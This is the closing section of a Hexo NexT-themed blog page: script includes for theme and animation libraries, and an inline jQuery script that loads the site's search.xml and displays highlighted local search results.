  
    <script type="text/javascript" src="/lib/three/three.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/canvas_lines.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  


  <script type="text/javascript" src="/js/src/clicklove.js"></script>

</body>
</html>
